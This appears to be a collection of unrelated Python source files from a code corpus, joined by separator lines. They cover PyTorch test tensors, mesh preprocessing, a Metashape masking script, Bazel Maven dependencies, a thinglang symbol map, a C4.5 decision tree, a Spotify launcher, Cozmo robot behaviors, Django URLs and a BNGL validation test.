unaligned = torch.Tensor([
[-0.9225, -0.2832],
[-0.7755, -0.2755],
[-0.1321, -0.4738],
[ 0.2905, -0.6044],
[-0.9225, 0.2201],
[-0.7755, 0.2172],
[-0.1321, 0.4091],
[ 0.2905, 0.5314]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
@register
def test7():
unaligned = torch.Tensor([
[-0.9369, -0.4814],
[-0.4945, -0.1954],
[-0.3008, -0.2248],
[ 0.2783, -0.4565],
[-0.9369, 0.4577],
[-0.4945, 0.1532],
[-0.3008, 0.1621],
[ 0.2783, 0.3577]
])
return torch.chunk(unaligned.unsqueeze(0), 2, dim=-2)
|
python
|
from os import path
from glob import glob
from cStringIO import StringIO
import numpy as np
import h5py
from scipy.sparse.csgraph import connected_components
from scipy.sparse import csr_matrix
from util import sort_nicely, veclen, filter_reindex
def convert_sequence_to_hdf5(filename_pattern, loader_function, hdf_output_file):
verts_all = []
tris = None
files = glob(path.expanduser(filename_pattern))
sort_nicely(files)
for i, f in enumerate(files):
print "loading file %d/%d [%s]" % (i+1, len(files), f)
verts, new_tris = loader_function(f)
if tris is not None and new_tris.shape != tris.shape and new_tris != tris:
raise ValueError, "inconsistent topology between meshes of different frames"
tris = new_tris
verts_all.append(verts)
verts_all = np.array(verts_all, np.float32)
verts_all, tris, _, verts_mean, verts_scale = preprocess_mesh_animation(verts_all, tris)
with h5py.File(hdf_output_file, 'w') as f:
f.create_dataset('verts', data=verts_all, compression='gzip')
f['tris'] = tris
f.attrs['mean'] = verts_mean
f.attrs['scale'] = verts_scale
print "saved as %s" % hdf_output_file
def preprocess_mesh_animation(verts, tris):
"""
Preprocess the mesh animation:
- removes zero-area triangles
- keep only the biggest connected component in the mesh
- normalize animation into -0.5 ... 0.5 cube
"""
print "Vertices: ", verts.shape
print "Triangles: ", verts.shape
assert verts.ndim == 3
assert tris.ndim == 2
# check for zero-area triangles and filter
e1 = verts[0, tris[:,1]] - verts[0, tris[:,0]]
e2 = verts[0, tris[:,2]] - verts[0, tris[:,0]]
n = np.cross(e1, e2)
tris = tris[veclen(n) > 1.e-8]
# remove unconnected vertices
ij = np.r_[np.c_[tris[:,0], tris[:,1]],
np.c_[tris[:,0], tris[:,2]],
np.c_[tris[:,1], tris[:,2]]]
G = csr_matrix((np.ones(len(ij)), ij.T), shape=(verts.shape[1], verts.shape[1]))
n_components, labels = connected_components(G, directed=False)
if n_components > 1:
size_components = np.bincount(labels)
if len(size_components) > 1:
print "[warning] found %d connected components in the mesh, keeping only the biggest one" % n_components
print "component sizes: "
print size_components
keep_vert = labels == size_components.argmax()
else:
keep_vert = np.ones(verts.shape[1], np.bool)
verts = verts[:, keep_vert, :]
tris = filter_reindex(keep_vert, tris[keep_vert[tris].all(axis=1)])
# normalize triangles to -0.5...0.5 cube
verts_mean = verts.mean(axis=0).mean(axis=0)
verts -= verts_mean
verts_scale = np.abs(verts.ptp(axis=1)).max()
verts /= verts_scale
print "after preprocessing:"
print "Vertices: ", verts.shape
print "Triangles: ", verts.shape
return verts, tris, ~keep_vert, verts_mean, verts_scale
def load_ply(filename):
try:
from enthought.tvtk.api import tvtk
except ImportError:
try:
from tvtk.api import tvtk
except ImportError:
print "Reading PLY files requires TVTK. The easiest way is to install mayavi2"
print "(e.g. on Ubuntu: apt-get install mayavi2)"
raise
reader = tvtk.PLYReader(file_name=filename)
reader.update()
polys = reader.output.polys.to_array().reshape((-1, 4))
assert np.all(polys[:,0] == 3)
return reader.output.points.to_array(), polys[:,1:]
def load_off(filename, no_colors=False):
lines = open(filename).readlines()
lines = [line for line in lines if line.strip() != '' and line[0] != '#']
assert lines[0].strip() in ['OFF', 'COFF'], 'OFF header missing'
has_colors = lines[0].strip() == 'COFF'
n_verts, n_faces, _ = map(int, lines[1].split())
vertex_data = np.loadtxt(
StringIO(''.join(lines[2:2 + n_verts])),
dtype=np.float)
if n_faces > 0:
faces = np.loadtxt(StringIO(''.join(lines[2+n_verts:])), dtype=np.int)[:,1:]
else:
faces = None
if has_colors:
colors = vertex_data[:,3:].astype(np.uint8)
vertex_data = vertex_data[:,:3]
else:
colors = None
if no_colors:
return vertex_data, faces
else:
return vertex_data, colors, faces
def save_off(filename, vertices=None, faces=None):
if vertices is None:
vertices = []
if faces is None:
faces = []
with open(filename, 'w') as f:
f.write("OFF\n%d %d 0\n" % (len(vertices), len(faces)))
if len(vertices) > 1:
np.savetxt(f, vertices, fmt="%f %f %f")
if len(faces) > 1:
for face in faces:
fmt = " ".join(["%d"] * (len(face) + 1)) + "\n"
f.write(fmt % ((len(face),) + tuple(map(int, face))))
def load_splocs(component_hdf5_file):
with h5py.File(component_hdf5_file, 'r') as f:
tris = f['tris'].value
Xmean = f['default'].value
names = sorted(list(set(f.keys()) - set(['tris', 'default'])))
components = np.array([
f[name].value - Xmean
for name in names])
return Xmean, tris, components, names
|
python
|
# This script created by Joseph Aaron Campbell - 10/2020
# this script references https://www.agisoft.com/forum/index.php?topic=10564.msg47949#msg47949
# Use this as a learning tool only.
# I am not responsible for any damage to data or hardware if the script is not properly utilized.
# Following Code tested and based on Metashape Pro 1.6.2 using Windows 10 Pro
""" With Help from:
https://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791
"""
"""
# # # # # # # # # # # # # # #
SET UP THE WORKING ENVIRONMENT
# # # # # # # # # # # # # # #
"""
import Metashape
"""create a reference to the current project"""
doc = Metashape.app.document
# create reference for list of chunks in project
chunkList = Metashape.app.document.chunks
# set reference to the currently selected chunk -- this should be the duplicated chunk from part-01
activeChunk = Metashape.app.document.chunk
# must include this line between each attempt to build a model. or it overwrites last created model
activeChunk.model = None
# using optimized sparse cloud, create lower resolution model
activeChunk.buildModel\
(
surface_type=Metashape.Arbitrary,
interpolation=Metashape.EnabledInterpolation,
face_count=Metashape.FaceCount.LowFaceCount,
face_count_custom=200000,
source_data=Metashape.PointCloudData,
vertex_colors=True,
vertex_confidence=True,
volumetric_masks=False,
keep_depth=True,
trimming_radius=10,
subdivide_task=True,
workitem_size_cameras=20,
max_workgroup_size=100
)
# import masks function using lower resolution model as source for all cameras in chunk
activeChunk.importMasks\
(
path='{filename}_mask.png',
source=Metashape.MaskSourceModel,
operation=Metashape.MaskOperationReplacement,
tolerance=10
)
# get the current Chunks label ( name )
currentChunkLabel = activeChunk.label
# get the current (saved) project's parent folder URL via python3 pathLib
# this path variable is used when exporting the 3D model later in the script.
# 'parent' will return the parent folder the project lives in
# 'name' will return the saved project name and extension
# 'stem' will return just the project name without extension
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print("parent Folder is : " + parentFolderPath)
# set reference to the output folders as string
outputFolder = Path(str(parentFolderPath) + "\\" + "_Output")
outputChunkFolder = Path(str(outputFolder) + "\\" + "_" + str(currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + "\\" + "_Masks")
print("output folder: " + str(outputFolder))
print("output chunk folder: " + str(outputChunkFolder))
print("model output folder is: " + str(outputMaskfolder))
# create an 'output' sub-folder for exported data from project
# also create sub-folder for model export within 'output' sub-folder
# this method will create the folder if doesnt exist, and also do nothing if it does exist
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
# export masks to output mask folder
# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file
# create a reference to the Tasks ExportMasks method
mask_task = Metashape.Tasks.ExportMasks()
# define which cameras to export masks for
mask_task.cameras = activeChunk.cameras
# define the output path for the exported mask files
mask_task.path = str(str(outputMaskfolder) + "\\" + "{filename}.png")
# activate the task for the active chunk to export the masks
mask_task.apply(object=activeChunk)
# delete lower resolution model
activeChunk.remove(activeChunk.models[0])
# save document
doc.save()
|
python
|
load("//tools/bzl:maven_jar.bzl", "maven_jar")
AWS_SDK_VER = "2.16.19"
AWS_KINESIS_VER = "2.3.4"
JACKSON_VER = "2.10.4"
def external_plugin_deps():
maven_jar(
name = "junit-platform",
artifact = "org.junit.platform:junit-platform-commons:1.4.0",
sha1 = "34d9983705c953b97abb01e1cd04647f47272fe5",
)
maven_jar(
name = "amazon-kinesis-client",
artifact = "software.amazon.kinesis:amazon-kinesis-client:" + AWS_KINESIS_VER,
sha1 = "6bb6fcbc5a0f6fd6085f3b1589e738485b0b7867",
)
maven_jar(
name = "amazon-kinesis",
artifact = "software.amazon.awssdk:kinesis:" + AWS_SDK_VER,
sha1 = "bec13fc5ef9225d1a10f13fbe1de8cb114448cf8",
)
maven_jar(
name = "amazon-dynamodb",
artifact = "software.amazon.awssdk:dynamodb:" + AWS_SDK_VER,
sha1 = "33ec7d291973658779b5777db2a0214a5c469e81",
)
maven_jar(
name = "amazon-cloudwatch",
artifact = "software.amazon.awssdk:cloudwatch:" + AWS_SDK_VER,
sha1 = "7585fbe349a92e0a9f040e4194ac89ca32e7983d",
)
maven_jar(
name = "amazon-regions",
artifact = "software.amazon.awssdk:regions:" + AWS_SDK_VER,
sha1 = "089f4f3d3ef20b2486f09e71da638c03100eab64",
)
maven_jar(
name = "amazon-netty-nio-client",
artifact = "software.amazon.awssdk:netty-nio-client:" + AWS_SDK_VER,
sha1 = "bb674feda8417513a647c7aa8cba9a537068d099",
)
maven_jar(
name = "amazon-utils",
artifact = "software.amazon.awssdk:utils:" + AWS_SDK_VER,
sha1 = "53edaa1f884682ac3091293eff3eb024ed0e36bb",
)
maven_jar(
name = "amazon-sdk-core",
artifact = "software.amazon.awssdk:sdk-core:" + AWS_SDK_VER,
sha1 = "02a60fd9c138048272ef8b6c80ae67491dd386a9",
)
maven_jar(
name = "amazon-aws-core",
artifact = "software.amazon.awssdk:aws-core:" + AWS_SDK_VER,
sha1 = "0f50f5cf2698a0de7d2d77322cbf3fb13f76187f",
)
maven_jar(
name = "amazon-http-client-spi",
artifact = "software.amazon.awssdk:http-client-spi:" + AWS_SDK_VER,
sha1 = "e4027e7e0cb064602100b34e19f131983f76f872",
)
maven_jar(
name = "amazon-auth",
artifact = "software.amazon.awssdk:auth:" + AWS_SDK_VER,
sha1 = "4163754b2a0eadcb569a35f0666fd5d859e43ef8",
)
maven_jar(
name = "reactive-streams",
artifact = "org.reactivestreams:reactive-streams:1.0.2",
sha1 = "323964c36556eb0e6209f65c1cef72b53b461ab8",
)
maven_jar(
name = "reactor-core",
artifact = "io.projectreactor:reactor-core:3.4.3",
sha1 = "df23dbdf95f892f7a04292d040fd8b308bd66602",
)
maven_jar(
name = "rxjava",
artifact = "io.reactivex.rxjava2:rxjava:2.1.14",
sha1 = "20dbf7496e417da474eda12717bf4653dbbd5a6b",
)
maven_jar(
name = "jackson-databind",
artifact = "com.fasterxml.jackson.core:jackson-databind:" + JACKSON_VER,
sha1 = "76e9152e93d4cf052f93a64596f633ba5b1c8ed9",
)
maven_jar(
name = "jackson-dataformat-cbor",
artifact = "com.fasterxml.jackson.dataformat:jackson-dataformat-cbor:" + JACKSON_VER,
sha1 = "c854bb2d46138198cb5d4aae86ef6c04b8bc1e70",
)
maven_jar(
name = "events-broker",
artifact = "com.gerritforge:events-broker:3.5.0-alpha-202108041529",
sha1 = "309fe8cc08c46593d9990d4e5c448cc85e5a62b0",
)
maven_jar(
name = "io-netty-all",
artifact = "io.netty:netty-all:4.1.51.Final",
sha1 = "5e5f741acc4c211ac4572c31c7e5277ec465e4e4",
)
maven_jar(
name = "awssdk-query-protocol",
artifact = "software.amazon.awssdk:aws-query-protocol:" + AWS_SDK_VER,
sha1 = "4c88c66daa5039813e879b324636d15fa2802787",
)
maven_jar(
name = "awssdk-protocol-core",
artifact = "software.amazon.awssdk:protocol-core:" + AWS_SDK_VER,
sha1 = "6200c1617f87eed0216c6afab35bab2403da140c",
)
maven_jar(
name = "awssdk-json-protocol",
artifact = "software.amazon.awssdk:aws-json-protocol:" + AWS_SDK_VER,
sha1 = "16449e555f61607b917dc7f242c1928298de9bdd",
)
maven_jar(
name = "awssdk-cbor-protocol",
artifact = "software.amazon.awssdk:aws-cbor-protocol:" + AWS_SDK_VER,
sha1 = "7353a868437576b9e4911779ae66a85ef6be0d9e",
)
maven_jar(
name = "awssdk-metrics-spi",
artifact = "software.amazon.awssdk:metrics-spi:" + AWS_SDK_VER,
sha1 = "d8669974b412766751b5eaf9c1edad908bfe5c38",
)
maven_jar(
name = "amazon-profiles",
artifact = "software.amazon.awssdk:profiles:" + AWS_SDK_VER,
sha1 = "5add2a843de43bd0acf45e1ab8c2b94c3638dd66",
)
maven_jar(
name = "apache-commons-lang3",
artifact = "org.apache.commons:commons-lang3:3.12.0",
sha1 = "c6842c86792ff03b9f1d1fe2aab8dc23aa6c6f0e",
)
maven_jar(
name = "testcontainer-localstack",
artifact = "org.testcontainers:localstack:1.15.2",
sha1 = "ae3c4717bc5f37410abbb490cb46d349a77990a0",
)
maven_jar(
name = "aws-java-sdk-core",
artifact = "com.amazonaws:aws-java-sdk-core:1.11.960",
sha1 = "18b6b2a5cb83a0e2e33a593302b5dbe0ca2ade64",
)
maven_jar(
name = "awssdk-url-connection-client",
artifact = "software.amazon.awssdk:url-connection-client:" + AWS_SDK_VER,
sha1 = "b84ac8bae45841bc65af3c4f55164d9a3399b653",
)
maven_jar(
name = "awssdk-kinesis-producer",
artifact = "com.amazonaws:amazon-kinesis-producer:0.14.6",
sha1 = "7f83582df816dccc5217f05ece309a5cd8c7a9a5",
)
maven_jar(
name = "aws-glue-schema-serde",
artifact = "software.amazon.glue:schema-registry-serde:1.0.0",
sha1 = "30815b670f89876465caa69b47e6df6fd6875d0f",
)
maven_jar(
name = "apache-commons-io",
artifact = "commons-io:commons-io:2.4",
sha1 = "b1b6ea3b7e4aa4f492509a4952029cd8e48019ad",
)
maven_jar(
name = "javax-xml-bind",
artifact = "javax.xml.bind:jaxb-api:2.3.1",
sha1 = "8531ad5ac454cc2deb9d4d32c40c4d7451939b5d",
)
|
python
|
import collections
from typing import List
from thinglang.lexer.values.identifier import Identifier, GenericIdentifier
from thinglang.symbols.merged_symbol import MergedSymbol
from thinglang.symbols.symbol import Symbol
from thinglang.utils import collection_utils
class SymbolMap(object):
"""
Describes a symbol map - the public fields (members and methods) of a ThingDefinition.
Each SymbolMap also has an index number, by which it is known to the runtime.
"""
def __init__(self, members: List[Symbol], methods: List[Symbol], name: Identifier, extends: Identifier, generics: List[Identifier], convention, member_offset: int=0, method_offset: int=0):
self.members, self.methods, self.name, self.extends, self.generics, self.convention, self.member_offset, self.method_offset = \
members, self.merge_method_symbols(methods), name, extends, generics or [], convention, member_offset, method_offset
self.lookup = {
symbol.name: symbol for symbol in self.members + self.methods
}
assert len(self.methods) + len(self.members) == len(self.lookup), 'Thing definition contains colliding elements'
assert {x.convention for x in self.lookup.values()} == {self.convention}, 'Inconsistent calling conventions identified'
def serialize(self) -> dict:
"""
Serialize this symbol map (and its symbols) into a dict
"""
return {
"name": self.name,
"extends": self.extends,
"generics": self.generics,
"offsets": {
"members": self.member_offset,
"methods": self.method_offset
},
"convention": Symbol.serialize_convention(self.convention),
"symbols": collection_utils.flatten([x.serialize() for x in self.lookup.values()])
}
@classmethod
def from_serialized(cls, data: dict) -> 'SymbolMap':
"""
Reads a serialized symbol map and returns a new SymbolMap object.
Additionally, deserializes its symbols into Symbol objects
"""
symbols = [Symbol.load(elem) for elem in data['symbols']]
members = [symbol for symbol in symbols if symbol.kind == Symbol.MEMBER]
methods = [symbol for symbol in symbols if symbol.kind == Symbol.METHOD]
extends = Symbol.load_identifier(data['extends']) if data['extends'] else None
return cls(members=members,
methods=methods,
name=Identifier(data['name']),
extends=extends,
generics=[Identifier(x) for x in data['generics']],
convention=Symbol.serialize_convention(data['convention']),
member_offset=data['offsets']['members'],
method_offset=data['offsets']['methods'])
@classmethod
def from_thing(cls, thing, extends: 'SymbolMap') -> 'SymbolMap':
"""
Creates a new Symbol map from a ThingDefinition
:param thing: the source ThingDefinition
:param index: the index of the new symbol map
:param extends: optionally, the symbol map from which this thing inherits
"""
member_offset, method_offset = 0, 0
if extends is not None:
member_offset, method_offset = len(extends.members) + extends.member_offset, len(extends.methods) + extends.method_offset
members = [elem.symbol().update_index(member_offset + index) for index, elem in enumerate(thing.members)]
methods = [elem.symbol().update_index(method_offset + index) for index, elem in enumerate(thing.methods)]
return cls(members,
methods,
thing.name,
thing.extends,
thing.generics,
Symbol.BYTECODE,
member_offset=member_offset,
method_offset=method_offset)
def parameterize(self, parameters: dict) -> 'SymbolMap':
"""
Creates a new SymbolMap, replacing the generic parameters in this SymbolMap with determined values
:param parameters: a mapping of generic name -> resolved name
"""
assert set(parameters.keys()) == set(self.generics), 'Partial parameterization is not allowed'
return SymbolMap(
[x.parameterize(parameters) for x in self.members],
[x.parameterize(parameters) for x in self.methods],
GenericIdentifier(self.name, tuple([parameters[x] for x in self.generics])),
self.extends,
[],
self.convention,
self.member_offset,
self.method_offset)
def __getitem__(self, item: Identifier) -> Symbol:
"""
Returns a symbol from this map
"""
return self.lookup[item]
def __contains__(self, item: Identifier) -> bool:
"""
Checks if a symbol identified by `item` exists
"""
return item in self.lookup
def __iter__(self):
"""
Iterates over all the fields of this symbol map
"""
return iter(self.lookup.values())
def __repr__(self):
return f'SymbolMap({self.name})'
@staticmethod
@collection_utils.drain()
def merge_method_symbols(methods):
method_symbols = collections.defaultdict(list)
for method_symbol in methods:
method_symbols[method_symbol.name].append(method_symbol)
for symbol_name, symbols in method_symbols.items():
yield symbols.pop() if len(symbols) == 1 else MergedSymbol(symbols)
|
python
|
# encoding:utf-8
from numpy import *
import math
import copy
import pickle
class C4_5DTree(object):
def __init__(self): # 构造方法
self.tree = {} # 生成的树
self.dataSet = [] # 数据集
self.labels = [] # 标签集
def loadDataSet(self, path, labels, split):
recordlist = []
with open(path, "r") as in_file:
for line in in_file:
recordlist.append(line.strip().split(split))
self.dataSet = recordlist
self.labels = labels
def train(self):
labels = copy.deepcopy(self.labels)
self.tree = self.buildTree(self.dataSet, labels)
def buildTree(self, dataSet, labels):
cateList = [data[-1] for data in dataSet]
if cateList.count(cateList[0]) == len(cateList):
return cateList[0]
if len(dataSet[0]) == 1:
return self.maxCate(cateList)
bestFeat, featValueList = self.getBestFeat(dataSet)
bestFeatLabel = labels[bestFeat]
tree = {bestFeatLabel: {}}
del (labels[bestFeat])
for value in featValueList:
subLabels = labels[:]
splitDataSet = self.splitDataSet(dataSet, bestFeat, value)
subTree = self.buildTree(splitDataSet, subLabels)
tree[bestFeatLabel][value] = subTree
return tree
# 计算出现次数最多的类别标签
def maxCate(self, catelist):
items = dict([(catelist.count(i), i) for i in catelist])
return items[max(items.keys())]
# 计算信息熵
def computeEntropy(self, dataSet): # 计算香农熵
datalen = float(len(dataSet))
cateList = [data[-1] for data in dataSet] # 从数据集中得到类别标签
# 得到类别为key、出现次数value的字典
items = dict([(i, cateList.count(i)) for i in cateList]) # 用法不错
infoEntropy = 0.0
for key in items:
prob = float(items[key]) / datalen
infoEntropy -= prob * math.log(prob, 2)
return infoEntropy
# 划分数据集;分隔数据集;删除特征轴所在的数据列, 返回剩余的数据集
# dataSet:数据集;axis:特征轴;value:特征轴取值
def splitDataSet(self, dataSet, axis, value):
rtnList = []
for featVec in dataSet:
if featVec[axis] == value:
rFeatVec = featVec[:axis] # list操作:提取0 - (axis - 1)的元素
rFeatVec.extend(featVec[axis + 1:])
rtnList.append(rFeatVec)
return rtnList
# 计算划分信息
def computeSplitInfo(self, featureVList):
numEntries = len(featureVList)
featureValueSetList = list(
set(featureVList))
valueCounts = [featureVList.count(featVec) for featVec in featureValueSetList]
pList = [float(item) / numEntries for item in valueCounts]
lList = [item * math.log(item, 2) for item in pList]
splitInfo = -sum(lList)
return splitInfo, featureValueSetList
# 计算最优特征
def getBestFeat(self, dataSet):
Num_Feats = len(dataSet[0][:-1]) # 4
totality = len(dataSet) # 1024
BaseEntropy = self.computeEntropy(dataSet)
ConditionEntropy = []
splitInfo = []
allFeatVList = []
for f in range(Num_Feats):
featList = [example[f] for example in dataSet]
[splitI, featureValueList] = self.computeSplitInfo(featList)
allFeatVList.append(featureValueList) # ['0','1','2'],['0','1','2'],['0','1']
splitInfo.append(splitI)
resultGain = 0.0
for value in featureValueList:
subSet = self.splitDataSet(dataSet, f, value)
appearNum = float(len(subSet))
subEntropy = self.computeEntropy(subSet)
resultGain += (appearNum / totality) * subEntropy
ConditionEntropy.append(resultGain)
infoGainArray = BaseEntropy * ones(Num_Feats) - array(ConditionEntropy)
# infoGainRatio = infoGainArray / array(splitInfo)
infoGainRatio = array([0 if j == 0 else i / j for i, j in zip(infoGainArray, splitInfo)])
bestFeatureIndex = argsort(-infoGainRatio)[0]
return bestFeatureIndex, allFeatVList[bestFeatureIndex]
def predict(self, inputTree, featLabels, testVec): # 分类器
root = list(inputTree.keys())[0]
secondDict = inputTree[root] # value-子树结构或分类标签
featIndex = featLabels.index(root) # 根节点在分类标签集中的位置
key = testVec[featIndex]
valueOfFeat = secondDict[key] # 易错点valueOfFeat = secondDict[key]
if isinstance(valueOfFeat, dict):
classLabel = self.predict(valueOfFeat, featLabels, testVec) # 递归分类
else:
classLabel = valueOfFeat
return classLabel
def storeTree(self, inputTree, filename):
fw = open(filename, 'wb')
# 对象持久化包
pickle.dump(inputTree, fw)
fw.close()
def grabTree(self, filename):
fr = open(filename, 'rb')
return pickle.load(fr)
|
python
|
import logging
import subprocess
import sys
class Spotify():
def __init__(self, args):
logging.info("Spotify Connect client started.")
command = "spotifyd --no-daemon"
self.process = subprocess.Popen(command, shell=True)
def stop(self):
self.process.kill()
logging.info("Stopped Spotify Connect client.")
|
python
|
# Copyright (c) 2016 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Behaviors represent a task that Cozmo may perform for an
indefinite amount of time.
For example, the "LookAroundInPlace" behavior causes Cozmo to start looking
around him (without driving), which will cause events such as
:class:`cozmo.objects.EvtObjectObserved` to be generated as he comes across
objects.
Behaviors must be explicitly stopped before having the robot do something else
(for example, pick up the object he just observed).
Behaviors are started by a call to :meth:`cozmo.robot.Robot.start_behavior`,
which returns a :class:`Behavior` object. Calling the :meth:`~Behavior.stop`
method on that object terminate the behavior.
The :class:`BehaviorTypes` class in this module holds a list of all available
behaviors.
'''
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['BEHAVIOR_IDLE', 'BEHAVIOR_REQUESTED', 'BEHAVIOR_RUNNING',
'BEHAVIOR_STOPPED',
'EvtBehaviorRequested', 'EvtBehaviorStarted', 'EvtBehaviorStopped',
'Behavior', 'BehaviorTypes']
import collections
from . import logger
from . import event
from ._clad import _clad_to_engine_cozmo, CladEnumWrapper
#: string: Behavior idle state (not requested to run)
BEHAVIOR_IDLE = 'behavior_idle'
#: string: Behavior requested state (waiting for engine to start it)
BEHAVIOR_REQUESTED = 'behavior_requested'
#: string: Behavior running state
BEHAVIOR_RUNNING = 'behavior_running'
#: string: Behavior stopped state
BEHAVIOR_STOPPED = 'behavior_stopped'
class EvtBehaviorRequested(event.Event):
'''Triggered when a behavior is requested to start.'''
behavior = 'The Behavior object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class EvtBehaviorStarted(event.Event):
'''Triggered when a behavior starts running on the robot.'''
behavior = 'The Behavior object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class EvtBehaviorStopped(event.Event):
'''Triggered when a behavior stops.'''
behavior = 'The behavior type object'
behavior_type_name = 'The behavior type name - equivalent to behavior.type.name'
class Behavior(event.Dispatcher):
'''A Behavior instance describes a behavior the robot is currently performing.
Returned by :meth:`cozmo.robot.Robot.start_behavior`.
'''
def __init__(self, robot, behavior_type, is_active=False, **kw):
super().__init__(**kw)
self.robot = robot
self.type = behavior_type
self._state = BEHAVIOR_IDLE
if is_active:
self._state = BEHAVIOR_REQUESTED
self.dispatch_event(EvtBehaviorRequested, behavior=self, behavior_type_name=self.type.name)
def __repr__(self):
return '<%s type="%s">' % (self.__class__.__name__, self.type.name)
def _on_engine_started(self):
if self._state != BEHAVIOR_REQUESTED:
# has not been requested (is an unrelated behavior transition)
if self.is_running:
logger.warning("Behavior '%s' unexpectedly reported started when already running")
return
self._state = BEHAVIOR_RUNNING
self.dispatch_event(EvtBehaviorStarted, behavior=self, behavior_type_name=self.type.name)
def _set_stopped(self):
if not self.is_active:
return
self._state = BEHAVIOR_STOPPED
self.dispatch_event(EvtBehaviorStopped, behavior=self, behavior_type_name=self.type.name)
def stop(self):
'''Requests that the robot stop performing the behavior.
Has no effect if the behavior is not presently active.
'''
if not self.is_active:
return
self.robot._set_none_behavior()
self._set_stopped()
@property
def is_active(self):
'''bool: True if the behavior is currently active and may run on the robot.'''
return self._state == BEHAVIOR_REQUESTED or self._state == BEHAVIOR_RUNNING
@property
def is_running(self):
'''bool: True if the behavior is currently running on the robot.'''
return self._state == BEHAVIOR_RUNNING
@property
def is_completed(self):
return self._state == BEHAVIOR_STOPPED
async def wait_for_started(self, timeout=5):
'''Waits for the behavior to start.
Args:
timeout (int or None): Maximum time in seconds to wait for the event.
Pass None to wait indefinitely. If a behavior can run it should
usually start within ~0.2 seconds.
Raises:
:class:`asyncio.TimeoutError`
'''
if self.is_running or self.is_completed:
# Already started running
return
await self.wait_for(EvtBehaviorStarted, timeout=timeout)
async def wait_for_completed(self, timeout=None):
'''Waits for the behavior to complete.
Args:
timeout (int or None): Maximum time in seconds to wait for the event.
Pass None to wait indefinitely.
Raises:
:class:`asyncio.TimeoutError`
'''
if self.is_completed:
# Already complete
return
# Wait for behavior to start first - it can't complete without starting,
# and if it doesn't start within a fraction of a second it probably
# never will
await self.wait_for_started()
await self.wait_for(EvtBehaviorStopped, timeout=timeout)
_BehaviorType = collections.namedtuple('_BehaviorType', ['name', 'id'])
class BehaviorTypes(CladEnumWrapper):
'''Defines all executable robot behaviors.
For use with :meth:`cozmo.robot.Robot.start_behavior`.
'''
_clad_enum = _clad_to_engine_cozmo.ExecutableBehaviorType
_entry_type = _BehaviorType
#: Turn and move head, but don't drive, with Cozmo's head angled
#: upwards where faces are likely to be.
FindFaces = _entry_type("FindFaces", _clad_enum.FindFaces)
#: Knock over a stack of cubes.
KnockOverCubes = _entry_type("KnockOverCubes", _clad_enum.KnockOverCubes)
#: Turn and move head, but don't drive, to see what is around Cozmo.
LookAroundInPlace = _entry_type("LookAroundInPlace", _clad_enum.LookAroundInPlace)
#: Tries to "pounce" (drive forward and lower lift) when it detects
#: nearby motion on the ground plane.
PounceOnMotion = _entry_type("PounceOnMotion", _clad_enum.PounceOnMotion)
#: Roll a block, regardless of orientation.
RollBlock = _entry_type("RollBlock", _clad_enum.RollBlock)
#: Pickup one block, and stack it onto another block.
StackBlocks = _entry_type("StackBlocks", _clad_enum.StackBlocks)
# Enroll a Face - for internal use by Face.name_face (requires additional pre/post setup)
_EnrollFace = _entry_type("EnrollFace", _clad_enum.EnrollFace)
# This enum deliberately only exposes a sub-set of working behaviors
BehaviorTypes._init_class(warn_on_missing_definitions=False, add_missing_definitions=False)
|
python
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.contrib.auth.decorators import login_required
from children.views import ChildrenTemplateView, ChildrenDetailView, ChildrenUpdateView
from children.views import ChildrenCreateView, ChildrenDeleteView, ChildListJson
urlpatterns = [
url(r'^$', ChildrenTemplateView.as_view(), name='list'),
url(r'^add/$', ChildrenCreateView.as_view(), name='add'),
url(r'^(?P<child_id>[0-9]+)/$', ChildrenDetailView.as_view(), name='detail'),
url(r'^(?P<child_id>[0-9]+)/edit/$', ChildrenUpdateView.as_view(), name='edit'),
url(r'^(?P<child_id>[0-9]+)/delete/$', ChildrenDeleteView.as_view(), name='delete'),
url(r'^(?P<child_id>[0-9]+)/params/', include('history.urls')),
url(r'^data-table/$', login_required(ChildListJson.as_view()), name='child_list_json')
]
|
python
|
from biosimulators_utils.model_lang.bngl.validation import validate_model, read_model
from biosimulators_utils.utils.core import flatten_nested_list_of_strings
import os
import shutil
import tempfile
import unittest
class BgnlValidationTestCase(unittest.TestCase):
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), '..', '..', 'fixtures', 'bngl')
def test(self):
errors, warnings, _ = validate_model(os.path.join(self.FIXTURE_DIR, 'valid.bngl'))
self.assertEqual(errors, [])
self.assertEqual(warnings, [])
fid, filename = tempfile.mkstemp()
os.close(fid)
shutil.copyfile(os.path.join(self.FIXTURE_DIR, 'valid.bngl'), filename)
errors, warnings, _ = validate_model(filename)
self.assertEqual(errors, [])
self.assertEqual(warnings, [])
os.remove(filename)
filename = os.path.join(self.FIXTURE_DIR, 'invalid.bngl2')
_, errors, _ = read_model(filename, '')
self.assertIn("not a valid BNGL or BGNL XML file", flatten_nested_list_of_strings(errors))
filename = os.path.join(self.FIXTURE_DIR, 'invalid.bngl')
errors, warnings, _ = validate_model(filename)
self.assertIn("not a valid BNGL", flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = os.path.join(self.FIXTURE_DIR, 'does-not-exist')
errors, warnings, _ = validate_model(filename)
self.assertIn('is not a file', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = None
errors, warnings, _ = validate_model(filename)
self.assertIn('must be a path', flatten_nested_list_of_strings(errors))
self.assertEqual(warnings, [])
filename = os.path.join(self.FIXTURE_DIR, '..', 'BIOMD0000000075.xml')
errors, warnings, _ = validate_model(filename)
